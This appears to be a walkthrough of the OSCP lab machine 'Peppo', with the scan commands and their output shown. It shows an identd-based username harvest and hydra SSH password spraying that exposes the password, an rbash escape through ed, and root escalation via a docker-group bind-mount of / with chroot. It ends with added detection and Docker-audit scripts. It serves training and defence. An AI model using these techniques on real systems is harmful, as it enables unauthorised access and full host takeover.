OSCP Official Lab: Peppo Walkthrough
Start the lab from the official site.

Information gathering
# Kali attack box
192.168.45.182
# Target
192.168.147.60
Scan ports and directories:
# Set the MTU on the VPN interface
sudo ip link set dev tun0 mtu 1250
ip link show tun0
# Port scan: collect every open port into a comma-separated list
ports=$(sudo nmap -p- --min-rate=5000 -Pn 192.168.147.60 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
echo $ports
# Service scan
sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.60
sudo nmap --script=vuln -p$ports -Pn 192.168.147.60
# Directory scan
sudo gobuster dir -u http://192.168.147.60:8080 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 25
sudo gobuster dir -u http://192.168.147.60:10000 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -t 25 --exclude-length 12
whatweb http://192.168.147.60:8080/
The scan results are as follows:
┌──(kali㉿kali)-[~]
└─$ echo $ports
22,53,113,5432,8080
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sC -sV -O -Pn -p$ports 192.168.147.60
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:13 EDT
Nmap scan report for 192.168.147.60
Host is up (0.12s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 2048 75:4c:02:01:fa:1e:9f:cc:e4:7b:52:fe:ba:36:85:a9 (RSA)
| 256 b7:6f:9c:2b:bf:fb:04:62:f4:18:c9:38:f4:3d:6b:2b (ECDSA)
|_ 256 98:7f:b6:40:ce:bb:b5:57:d5:d1:3c:65:72:74:87:c3 (ED25519)
53/tcp closed domain
113/tcp open ident FreeBSD identd
|_auth-owners: nobody
5432/tcp open postgresql PostgreSQL DB 9.6.0 or later
8080/tcp open http WEBrick httpd 1.4.2 (Ruby 2.6.6 (2020-03-31))
|_http-server-header: WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)
| http-robots.txt: 4 disallowed entries
|_/issues/gantt /issues/calendar /activity /search
|_http-title: Redmine
Aggressive OS guesses: Linux 3.10 - 4.11 (96%), Linux 3.13 - 4.4 (96%), Linux 3.2 - 4.14 (94%), Linux 2.6.32 - 3.13 (93%), Linux 3.8 - 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.13 or 4.2 (90%), Linux 4.4 (90%), Linux 2.6.32 - 3.10 (90%), Linux 5.0 - 5.14 (90%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OSs: Linux, FreeBSD; CPE: cpe:/o:linux:linux_kernel, cpe:/o:freebsd:freebsd
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.27 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p$ports -Pn 192.168.147.60
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-15 03:27 EDT
Nmap scan report for 192.168.147.60
Host is up (0.12s latency).
PORT STATE SERVICE
22/tcp open ssh
53/tcp closed domain
113/tcp open ident
5432/tcp open postgresql
8080/tcp open http-proxy
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server''s resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-enum:
| /login.stm: Belkin G Wireless Router
| /admin.php: Possible admin folder (401 Unauthorized )
| /login.php: Possible admin folder
| /login.html: Possible admin folder
| /admin.cfm: Possible admin folder (401 Unauthorized )
| /login.cfm: Possible admin folder
| /admin.asp: Possible admin folder (401 Unauthorized )
| /login.asp: Possible admin folder
| /admin.aspx: Possible admin folder (401 Unauthorized )
| /login.aspx: Possible admin folder
| /admin.jsp: Possible admin folder (401 Unauthorized )
| /login.jsp: Possible admin folder
| /users.sql: Possible database backup (401 Unauthorized )
| /login/: Login page
| /login.htm: Login page
| /login.jsp: Login page
| /robots.txt: Robots file
| /admin.nsf: Lotus Domino (401 Unauthorized )
| /news/: Potentially interesting folder
|_ /search/: Potentially interesting folder
Nmap done: 1 IP address (1 host up) scanned in 413.78 seconds
┌──(kali㉿kali)-[~]
└─$ whatweb http://192.168.147.60:8080
http://192.168.147.60:8080 [200 OK] ChiliProject, Cookies[_redmine_session], Country[RESERVED][ZZ], HTML5, HTTPServer[WEBrick/1.4.2 (Ruby/2.6.6/2020-03-31)], HttpOnly[_redmine_session], IP[192.168.147.60], JQuery, Redmine, Ruby[2.6.6,WEBrick/1.4.2], Script, Title[Redmine], UncommonHeaders[x-content-type-options,x-download-options,x-permitted-cross-domain-policies,referrer-policy,x-request-id], X-Frame-Options[SAMEORIGIN], X-UA-Compatible[IE=edge], X-XSS-Protection[1; mode=block]
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/newsnews (Status: 200) [Size: 5361]
/searchsearch (Status: 200) [Size: 7933]
/loginlogin (Status: 200) [Size: 5011]
/projectsprojects (Status: 200) [Size: 12258]
/usersusers (Status: 302) [Size: 150] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fusers]
/adminadmin (Status: 302) [Size: 150] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fadmin]
/issuesissues (Status: 200) [Size: 19698]
/groupsgroups (Status: 302) [Size: 151] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fgroups]
/mymy (Status: 302) [Size: 147] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fmy]
/logoutlogout (Status: 302) [Size: 93] [--> http://192.168.147.60:8080/]
/404404 (Status: 200) [Size: 459]
/settingssettings (Status: 302) [Size: 153] [--> http://192.168.147.60:8080/login?back_url=http%3A%2F%2F192.168.147.60%3A8080%2Fsettings]
/activityactivity (Status: 200) [Size: 7312]
/500500 (Status: 200) [Size: 648]
Progress: 24077 / 220559 (10.92%)^C
Nothing interesting was found.
SSH password brute force
sudo apt install ident-user-enum
ident-user-enum 192.168.147.60 22 113 8080 10000
hydra -L users.txt -P users.txt ssh://192.168.147.60
ident-user-enum queries the identd service (port 113) for the usernames that own each listening port; the names it returns are then tried in username = password form (the same file is passed to hydra as both -L and -P).
This yields the SSH username and password.
[!tip] SSH password: eleanor
After logging in, the shell turns out to be restricted: only a limited set of commands can be run, so we need to escape it.
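The username = password spray above leaves a recognisable trace in the target's sshd log: a burst of failures against several distinct users from one source, followed by a success. The following detector is an added example written for this walkthrough, not part of the original post; the auth.log lines it runs over are constructed sample data (the hostname `peppo` and the source addresses are assumptions).

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd lines in /var/log/auth.log format (sample data, not captured from the lab).
SAMPLE_AUTH_LOG = """\
Oct 15 03:40:01 peppo sshd[2101]: Failed password for invalid user admin from 192.168.45.182 port 51002 ssh2
Oct 15 03:40:01 peppo sshd[2102]: Failed password for root from 192.168.45.182 port 51003 ssh2
Oct 15 03:40:02 peppo sshd[2103]: Failed password for eleanor from 192.168.45.182 port 51004 ssh2
Oct 15 03:40:02 peppo sshd[2104]: Failed password for invalid user postgres from 192.168.45.182 port 51005 ssh2
Oct 15 03:40:03 peppo sshd[2105]: Accepted password for eleanor from 192.168.45.182 port 51006 ssh2
Oct 15 03:45:10 peppo sshd[2230]: Failed password for eleanor from 10.0.0.7 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)

def parse_auth_log(text, year=2025):
    """Return (timestamp, result, user, ip) tuples; syslog lines carry no year, so one is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["result"], m["user"], m["ip"]))
    return events

def detect_spray(events, threshold=3, window=timedelta(minutes=1)):
    """Flag sources that fail against >= threshold distinct users inside one window,
    and record whether that same source later logged in successfully."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e[1] == "Failed"]
        for i, (start, _, _, _) in enumerate(fails):
            burst = [e for e in fails[i:] if e[0] - start <= window]
            users = {e[2] for e in burst}
            if len(users) >= threshold:
                success = any(e[1] == "Accepted" and e[0] >= start for e in evs)
                alerts[ip] = {"users": sorted(users), "failures": len(burst),
                              "followed_by_success": success}
                break
    return alerts
```

The single failure from 10.0.0.7 stays below the threshold, while the spraying source is reported together with the fact that a login succeeded right after it.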
rbash escape
Reference: https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

echo $PATH # inspect the PATH variable
ed
!/bin/bash
export PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
This gives the first flag.

Privilege escalation
While looking at /etc/passwd, a notice appeared saying there was new mail.
Perhaps that triggered some sort of administrator warning e-mail? When I tried sudo -l just now to escalate, I found I had no permission.
The user is a member of the docker group, so escalate privileges through Docker.

docker images # list the images available locally
docker run -v /:/mnt --rm -it redmine chroot /mnt bash # mount the host root at /mnt and chroot into it
cat root/proof.txt
This gives the second flag.
Summary
Attack path diagram
flowchart TD
%% Asset list
A[Kali attack box <br> 192.168.45.182]
B[Target <br> 192.168.147.60]
C[SSH password brute force]
D[rbash escape]
E[Docker escape]
%% Path relations
A-->|scan|B
B-->C
C-->D
D-->E
%% Line types: --- (solid), -.-> (dashed), ==> (thick arrow)
%% -->|yes|: link with condition text
%% Rectangular node [ ], diamond decision node { }, rounded node ( )
%% Style definitions
classDef attack fill:#ffcccc,stroke:#ff0000,stroke-width:2px;
classDef public fill:#ffeecc,stroke:#ff9900,stroke-width:2px;
classDef internal fill:#ccffcc,stroke:#009900,stroke-width:2px;
%% Line style and colour scheme (works on light and dark themes)
linkStyle default stroke:#666666,stroke-width:2px,stroke-dasharray:0;
%% Apply styles
class A attack;
class B public;
class C,D,E internal;
Attack timeline
gantt
title Attack timeline
dateFormat YYYY-MM-DD HH:mm
axisFormat %H:%M
section Reconnaissance
Target scanning :a1, 2025-10-15 15:13, 2025-10-15 15:40
Vulnerability identification :a2, after a1, 15m
section Attack
Initial access :b1, after a2, 2025-10-15 16:40
Privilege escalation :crit,b2, after b1, 5m
section Post-exploitation
Data exfiltration :c1, after b2, 5m
Supplementary notes: Docker privilege escalation
The reason this command yields root is the combination of Docker's privileged operation with a filesystem mount. A detailed explanation follows:
🔧 Command breakdown:
docker run -v /:/mnt --rm -it redmine chroot /mnt bash
- docker run: start a new container
- -v /:/mnt: the key step: mount the host's entire root filesystem (/) at /mnt inside the container, so the container can read and write every host file directly
- --rm: delete the container automatically when it exits
- -it: allocate an interactive terminal
- redmine: the image to use (any locally available image would do)
- chroot /mnt bash: the core escape: run chroot inside the container to switch the root directory to the host filesystem (/mnt), then start a bash shell there
🚀 Why this gives root:
- Docker group privilege: your user belongs to the docker group (groups=...999(docker)); docker group members can run containers, and commands inside a container run as root by default
- Filesystem mount: -v /:/mnt lets the container access the host's complete filesystem
- chroot switch: chroot /mnt moves the working environment onto the host filesystem, so commands you run in the container now operate on the host
- Privilege inheritance: without user namespace remapping, the container's root user is the host's root user, so every command in the chroot runs with host root privileges
⚠️ Security risk:
This is extremely dangerous because it:
- completely bypasses the system's permission controls
- allows arbitrary modification of system files
- exposes every user's data
- is equivalent to obtaining root on the host directly
🔒 What system administrators should do:
- Restrict docker group membership (remove the user from the docker group):
sudo gpasswd -d eleanor docker
- Enable user namespace isolation, so that root inside a container maps to an unprivileged host uid:
# /etc/docker/daemon.json
{ "userns-remap": "default" }
- Restrict dangerous mounts and capabilities when containers are launched:
docker run --cap-drop=ALL --security-opt no-new-privileges ...
Note that --cap-drop and no-new-privileges harden what runs inside a container; they do not stop a docker group member from bind-mounting / in the first place, which is why the first item (keeping untrusted users away from the daemon) matters most.
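To check a host for the two conditions this section describes (users who can reach the daemon, and running containers that bind-mount the host root or chroot into it), the following audit helpers run over `docker inspect` JSON and an /etc/group excerpt. This is an added example written for this walkthrough, not code from the original post or from Docker; both inputs are constructed sample data, and the container names and ids are assumptions.

```python
import json

# Constructed `docker inspect` output for two containers (sample data, not captured from the lab):
# "escape" is the -v /:/mnt ... chroot pattern from the write-up, "web" is an ordinary run.
SAMPLE_INSPECT = json.dumps([
    {"Id": "a1b2", "Name": "/escape",
     "Config": {"Image": "redmine", "Cmd": ["chroot", "/mnt", "bash"]},
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/mnt", "RW": True}]},
    {"Id": "c3d4", "Name": "/web",
     "Config": {"Image": "redmine", "Cmd": ["rails", "server", "-b", "0.0.0.0"]},
     "HostConfig": {"Binds": [], "Privileged": False},
     "Mounts": [{"Type": "volume", "Source": "/var/lib/docker/volumes/redmine-data/_data",
                 "Destination": "/usr/src/redmine/files", "RW": True}]},
])

# Constructed /etc/group excerpt; gid 999 matches the groups=...999(docker) output quoted above.
SAMPLE_GROUP = "root:x:0:\nsudo:x:27:\ndocker:x:999:eleanor\n"

# Host paths whose bind-mount hands a container the host itself, not just application data.
SENSITIVE_PREFIXES = ("/", "/etc", "/root", "/proc", "/sys", "/var/run/docker.sock")

def is_sensitive(path):
    return any(path == p or path.startswith(p + "/") for p in SENSITIVE_PREFIXES)

def risky_containers(inspect_json):
    """Return (name, image, reasons) for containers whose settings amount to host root."""
    findings = []
    for c in json.loads(inspect_json):
        reasons = []
        if c["HostConfig"].get("Privileged"):
            reasons.append("privileged")
        for m in c.get("Mounts", []):
            if m["Type"] == "bind" and is_sensitive(m["Source"]):
                mode = "rw" if m.get("RW") else "ro"
                reasons.append(f"bind-mount {m['Source']} -> {m['Destination']} ({mode})")
        cmd = " ".join(c["Config"].get("Cmd") or [])
        if cmd.startswith("chroot "):
            reasons.append(f"entrypoint chroot: {cmd}")
        if reasons:
            findings.append((c["Name"].lstrip("/"), c["Config"]["Image"], reasons))
    return findings

def docker_group_members(group_file_text):
    """Users in the docker group; each can reach the daemon and is therefore effectively root."""
    for line in group_file_text.splitlines():
        parts = line.split(":")
        if len(parts) == 4 and parts[0] == "docker":
            return [m for m in parts[3].split(",") if m]
    return []
```

On a live host, feed it `docker inspect $(docker ps -q)` and the contents of /etc/group; the ordinary Redmine container produces no finding, while the escape-style run is reported for both the root bind-mount and the chroot entrypoint.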